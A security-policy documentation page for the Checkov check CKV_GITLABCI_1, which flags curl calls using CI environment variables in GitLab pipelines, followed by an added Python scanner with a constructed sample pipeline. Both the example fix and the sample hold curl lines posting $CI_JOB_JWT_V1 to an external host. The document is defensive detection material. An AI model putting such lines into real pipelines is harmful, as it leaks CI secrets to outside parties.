Suspicious use of curl with CI environment variables in script
Error: Suspicious use of curl in a GitLab CI environment
Bridgecrew Policy ID: BC_REPO_GITLAB_CI_1
Checkov Check ID: CKV_GITLABCI_1
Severity: LOW
Ensure that there are no suspicious uses of curl with CI environment variables in script
Description
Using curl with environment variables could be an attempt to exfiltrate secrets from a pipeline. Investigate if the use of curl is appropriate and secure.
Example Fix
Block and remove any code that attempts to exfiltrate secrets, such as the following job script:
deploy:
- script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826'
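The following is an added example, not Checkov's own implementation of CKV_GITLABCI_1: it finds script lines that combine curl with CI_ variables so they can be investigated, and separates calls to a literal external URL from calls addressed through the GitLab instance's own URL variables. The sample pipeline and its host are constructed, and treating CI_API_V4_URL and CI_SERVER_URL as "the GitLab instance itself" is an assumption of this example.

```python
import re

# Constructed sample pipeline; host and job names are made up for this example.
SAMPLE = r'''build:
  script:
    - make all
    # curl "$CI_JOB_TOKEN" inside a comment is ignored
deploy:
  script:
    - 'curl -X POST --data "$CI_JOB_JWT_V1" https://collector.example.invalid/hook'
release:
  script:
    - 'curl --header "JOB-TOKEN: ${CI_JOB_TOKEN}" "$CI_API_V4_URL/projects/1/releases"'
'''

CI_VAR = re.compile(r"\$\{?(CI_[A-Z0-9_]+)\}?")   # $CI_FOO and ${CI_FOO}
CURL = re.compile(r"(?<![\w-])curl(?![\w-])")     # the curl command, not e.g. "libcurl"
LITERAL_URL = re.compile(r"https?://[^\s'\"]+")   # hard-coded destination
JOB_KEY = re.compile(r"^([^\s#-][^:]*):\s*$")     # unindented "name:" line
# Assumption: URLs built from these variables point at the GitLab instance itself.
INSTANCE_URL_VARS = {"CI_API_V4_URL", "CI_SERVER_URL"}

def scan(text):
    """Return one finding per line that runs curl and references a CI_ variable.

    Line-based on purpose (no YAML dependency); a curl command split across
    continuation lines is only checked on the line that contains "curl".
    """
    findings, job = [], None
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        key = JOB_KEY.match(line)
        if key:
            job = key.group(1)
            continue
        variables = sorted(set(CI_VAR.findall(stripped)))
        if not (CURL.search(stripped) and variables):
            continue
        urls = LITERAL_URL.findall(stripped)
        sent = [v for v in variables if v not in INSTANCE_URL_VARS]
        findings.append({"job": job, "line": lineno, "variables": sent,
                         "external_urls": urls,
                         "review_first": bool(urls and sent)})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Every finding still warrants a look; `review_first` only orders the queue so that CI variables sent to a hard-coded host are examined before calls to the instance API.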